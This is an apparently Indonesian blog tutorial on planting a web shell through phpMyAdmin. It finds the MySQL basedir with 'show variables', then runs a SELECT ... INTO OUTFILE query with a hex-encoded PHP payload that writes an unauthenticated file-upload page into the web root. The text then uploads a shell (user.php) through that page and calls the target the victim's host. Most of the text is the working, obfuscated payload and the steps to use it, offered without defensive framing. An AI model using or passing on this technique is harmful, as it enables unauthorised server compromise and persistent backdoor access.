Upload Shell di Localhost

Disini saya melakukan injection pada localhost langkah awal masuk ke http://localhost/phpmyadmin/ setelah itu klik tab query di atas kiri lalu ketikkan show variables kemudian klik go,lalu cari Basedir

ket : no 1 ialah Tab Query, no 2 mengetikkan kata show variables untuk mencari Basedir

setelah di tekan go maka hasil yang keluar ialah ditemukannya basedir C:AppServ\MySQL\

ket : pada umumnya derectory selanjutnya kemungkinan htdoc,atau www.

jika telah ketemu maka langkah selanjutnya kita tinggal membuat page upload pada SQL dengan perintah

select 

0x3c3f706870206563686f20223c666f726d206d6574686f643d27

504f53542720656e63747970653d276d756c7469706172742f666f

726d2d64617461273e3c696e70757420747970653d2766696c652

7206e616d653d2766696c656c65272073697a653d273434273e3c

696e70757420747970653d277375626d6974273e3c2f666f726d3

e223b40636f707928245f46494c45535b2766696c656c65275d5b

27746d705f6e616d65275d2c245f46494c45535b2766696c656c6

5275d5b276e616d65275d293b3f3e 

into outfile 'c:/AppServ/www/upload.php'

perintah diatas kita copy paste kan pada Tab Query,lihat gambar dibawah

selanjutnya jika tlah terbuat page upload ny,silakan anda upload shell,dengan klik Telusuri dan Kirim Kuery.

ket : nama shell yang saya masukkan ialah user.php dan klik tombol open kemudian klik tombol Kirim Kueri maka shell saya akan tersimpan pada http://localhost/user.php dan shell telah terupload pada localhost korban.

Semoga menjadi ilmu tambahan buat kita semua. Terima Kasih.